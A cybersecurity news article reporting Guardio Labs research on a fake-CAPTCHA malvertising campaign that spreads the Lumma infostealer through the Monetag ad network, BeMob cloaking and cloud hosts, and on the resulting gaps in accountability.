Fake CAPTCHAs reaching millions: who’s responsible for malvertising mayhem?


Legitimate publishers are displaying malicious ads. A legitimate ad network is serving them. A legitimate analytics platform is cloaking them. Legitimate cloud providers are hosting malicious websites and actual malware. Legitimate search engines help drive traffic. Everyone is pointing the finger and no one is accountable.

The new malvertising campaign abusing fake captchas to drive infostealer infections has an astonishing reach.

“Over just the past ten days, our analysis estimated up to 1M “ad impressions” per day, arriving from around 3000+ publisher sites,” a new report by Guardio Labs has uncovered.

ADVERTISEMENT

Cybernews recently reported on threat actors successfully using malicious bot detection prompts to drop the infostealer Lumma. The fake captchas appear unexpectedly as users browse and mimic the real verification process.

They ask users to press three key combinations, which secretly copy-paste a malicious PowerShell command from the clipboard to the system’s Run window and execute it.

The less clear part was how the threat actors actually delivered such popups to unsuspecting users.

“This initial deceit is just the surface,” Guardio Labs said.

The success of the campaign lies in the sophisticated exploitation of underlying mechanics of advertising networks to deliver “malvertising on steroids.”

Ad networks enable the delivery of powerful malware

Threat actors often abuse ad networks, as they are essential links to distribute traffic from publishers’ websites to advertisers' landing pages. Even Facebook ads or Google’s Search sponsored results aren’t immune to malvertising.

“Ad networks have proven exceptionally successful; they are fine-tuned machines built from the ground up to distribute traffic on a massive scale,” the Guardio Labs explain in the new report.

ADVERTISEMENT

After dissecting the fake captcha campaign, the researchers discovered that it is entirely based on malvertising originating from a single ad network service Monetag. Monetag is a subsidiary of PropellerAds, a large ad network company based in Cyprus, which previously had been caught peddling ads that urge users to scan computers or update software.

For advertisers, creating a Monetag account is straightforward. The firm provides script tags, popup tabs, banners, push notifications, and other tools to run ads.

However, the researchers claim that provided scripts perform extensive fingerprinting, inject tracking cookies, scan the website content, and “essentially ‘hijack’ the site, capturing clicks to spawn new ad tabs, soliciting notification permissions, and even deploying pop-over iframes.”

The malicious ads were delivered to a “plethora of websites,” which were often linked to the piracy of movies or live sports streams and even direct links on social media. Due to aggressive search engine optimization, some of these websites appeared on top of Google Search results.

monetag-involvement

“We identified approximately 3,000 publisher sites actively using Monetag ad-zone scripts in the last ten days. These scripts track visitors and trigger intrusive actions such as push notifications and new tab pop-ups. For instance, the anime site “hianime[.]to” alone garnered over 100k+ unique visits last month.”

Malicious ads did not directly lead to malicious websites, and another service was used for cloaking. Threat actors abused the BeMob ad tracking service.

“By supplying a benign BeMob URL to Monetag’s ad management system instead of the direct fake captcha page, the attackers leveraged BeMob’s reputation, complicating Monetag's content moderation efforts,” the researchers explain.

The malicious captcha pages were again hosted on services like Oracle Cloud, Scaleway, Bunny CDN, EXOScale, and even Cloudflare.

In one example, the researchers provided a Cloudflare-themed fake captcha page hosted on Cloudflare R2 storage.

ADVERTISEMENT
cloudflare-involvement

“As we delve deeper into the distribution method known as malvertising, it becomes clear how intricate and complicated the fake captcha campaign truly is. Yet, the core operations heavily rely on the ad network – essentially, their standard business practice is transformed for malicious use,” the report explains.

No one is fully accountable

While a single ad click sets off a chain reaction involving multiple service providers, domains, servers, and stakeholders, each of them has a convenient excuse.

The ad network won't moderate the creative content because it’s cloaked behind an ad statistics service. The ad tracking service argues that it’s merely an analytics tool. The publishers will distance themselves, saying they’re monetizing their websites via third-party services. Hosting services are also largely ignorant.

jurgita Niamh Ancell BW Paulina Okunyte Konstancija Gasaityte profile
Get our latest stories today on Google News

“This fragmented chain of ownership creates a perfect storm of plausible deniability, making it exceptionally difficult to pinpoint and enforce accountability. It’s a system designed to shift blame while allowing malicious campaigns to thrive,” Guardio Labs said.

The researchers responsibly disclosed their findings to the companies involved, and Monetag swiftly banned over 200 accounts linked to the abuse. The actions significantly reduced the fake captcha page views. However, the impressions started to pick up again after more than a week.

traffic-fake-captcha

The researchers warn that this is just a single example exposing the “darker side of the internet’s advertising ecosystem.” Advertising has become a cornerstone of the modern internet, but the profit-driven ecosystem faces a significant conflict of interest and leaves users vulnerable.

ADVERTISEMENT

“The takeaway is simple: be cautious of websites offering FREE content you would otherwise pay for. As we always say – there’s no such thing as a free gift on the internet,” the researchers concluded.